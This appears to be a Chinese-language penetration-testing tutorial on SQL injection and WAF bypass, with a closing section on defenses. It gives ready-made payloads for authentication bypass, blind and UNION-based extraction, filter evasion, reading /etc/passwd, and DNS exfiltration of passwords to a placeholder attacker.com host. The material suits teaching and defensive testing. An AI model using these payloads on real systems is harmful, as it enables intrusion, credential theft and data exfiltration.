SQL注入攻防实战：从原理到WAF绕过技术

1. SQL注入攻防全景解析

十年前我刚接触Web安全时，第一次成功利用SQL注入获取管理员权限的场景至今记忆犹新。那种"原来系统可以这样被突破"的震撼，促使我走上了网络安全研究的道路。如今虽然各类防护手段层出不穷，但SQL注入依然位列OWASP Top 10，原因就在于其攻击门槛低、危害大、变化多端。

本文将带你从最基础的注入原理开始，逐步深入到现代WAF绕过技术。不同于教科书式的理论讲解，我会结合这些年实际渗透测试中积累的案例，重点分享那些真正有效的攻击手法和防御方案。无论你是刚入门的安全爱好者，还是需要加固系统的开发人员，都能从中获得可直接复用的实战经验。

2. SQL注入核心原理剖析

2.1 注入漏洞的根源机制

SQL注入的本质是"数据与代码的混淆"。当应用程序将用户输入直接拼接到SQL语句中时，攻击者通过构造特殊输入，改变原有SQL语义。举个典型场景：

sql复制-- 原始语句
SELECT * FROM users WHERE username = '[用户输入]' AND password = '[用户输入]'

-- 攻击输入
admin' --

此时执行的SQL变为：

sql复制SELECT * FROM users WHERE username = 'admin' --' AND password = ''

--是SQL注释符，使得密码验证被绕过。这种基础注入在2000年初期的网站中几乎百发百中，现在虽然少见，但理解它有助于掌握更复杂的变种。

2.2 注入点检测方法论

在实际测试中，我通常采用渐进式检测策略：

1. 基础探测：在输入点提交单引号'，观察是否返回数据库错误（如MySQL的"You have an error in your SQL syntax"）

2. 布尔测试：

   sql复制id=1' AND 1=1 -- 正常显示
   id=1' AND 1=2 -- 无结果
   

   这种差异确认存在注入漏洞

3. 时间盲注检测：

   sql复制id=1' AND IF(1=1,SLEEP(5),0) --
   

   观察响应延迟，适用于无错误回显的场景

重要提示：测试前务必获得授权，未经许可的测试可能构成违法行为

3. 现代WAF绕过技术详解

3.1 WAF工作原理与常见规则

主流WAF（如ModSecurity、Cloudflare）通常通过以下机制防御SQL注入：

1. 关键词过滤：UNION、SELECT、FROM等
2. 特殊字符检测：单引号、注释符、括号等
3. 语法分析：检测非常规SQL语句结构

3.2 高级绕过手法实录

3.2.1 编码混淆技术

sql复制-- 十六进制编码
SELECT * FROM users WHERE username=0x61646d696e

-- 字符拼接
SEL%0bECT * FR%0bOM users WH%0bERE 1=1

3.2.2 注释分割技巧

sql复制/*!50000SELECT*/ * FROM/*!50000users*/ WHERE id=1

MySQL特有的内联注释语法，数字表示最低MySQL版本

3.2.3 等价函数替换

sql复制-- 代替CONCAT
SELECT MAKE_SET(1,'a','b') 

-- 代替ASCII
SELECT ORD('a')

3.3 我的WAF绕过checklist

1. 大小写变异：SeLeCt
2. 空白符替代：%09(tab)、%0a(换行)
3. 注释插入：SEL/*xxx*/ECT
4. 多重编码：%2527代替单引号
5. 非常规语法：SELECT[1]FROM[users]

4. 实战注入全流程演示

4.1 信息收集阶段

sql复制-- 获取数据库版本
' UNION SELECT @@version,null --

-- 查询表名
' UNION SELECT table_name,null FROM information_schema.tables --

4.2 数据提取技巧

4.2.1 分组concat技巧

sql复制-- MySQL中合并多行结果
SELECT GROUP_CONCAT(username) FROM users

4.2.2 二进制数据导出

sql复制-- 将文件转为16进制输出
SELECT HEX(LOAD_FILE('/etc/passwd'))

4.3 OOB(带外)数据外传

当直接回显被限制时，可通过DNS或HTTP请求外传数据：

sql复制-- MySQL DNS外传
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share'))

5. 企业级防御方案设计

5.1 开发层防护

1. 参数化查询（最佳实践）：

   python复制# Python示例
   cursor.execute("SELECT * FROM users WHERE username = %s", (user_input,))
   

2. 输入验证白名单：

   php复制// 用户名只允许字母数字
   if (!preg_match('/^[a-zA-Z0-9]+$/', $username)) {
       die('Invalid input');
   }
   

5.2 架构层防护

1. 最小权限原则：数据库账户只赋予必要权限
2. 语句白名单：对高频查询使用存储过程
3. 敏感数据加密：如密码使用bcrypt哈希

5.3 WAF规则优化建议

apache复制# ModSecurity规则示例
SecRule ARGS "@detectSQLi" \
    "id:1001,\
    phase:2,\
    block,\
    msg:'SQL Injection Attack'"

应定期更新规则库，重点关注：

• 非常规编码检测
• 语法树分析
• 行为模式识别

6. 渗透测试中的疑难解决

6.1 无回显场景处理

时间盲注解决方案：

sql复制' AND IF(ASCII(SUBSTR((SELECT password FROM users LIMIT 1),1,1))>100,SLEEP(3),0) --

使用二分法逐步确定字符值，虽然耗时但可靠

6.2 过滤绕过实战案例

某次测试遇到过滤了SELECT和空格的情况，最终payload：

sql复制'%0b/*!50000sElEcT*/%0buser,%0bpass%0bFrOm%0busers--+

通过内联注释和空白符绕过关键词检测

6.3 性能优化技巧

1. 使用LIMIT减少数据传输
2. 优先猜测常见表名（users, admin, customer）
3. 对字段类型预判（如密码字段通常是varchar）

7. 防御体系构建心得

在给某金融系统做加固时，我们实施了深度防御策略：

1. 应用层：所有查询改用ORM框架
2. 中间层：部署行为分析型WAF
3. 数据层：启用SQL日志审计
4. 运维层：定期进行模糊测试

这套方案成功拦截了后续三次红队演练中的注入攻击。关键点在于防御需要层层递进，不能依赖单一措施。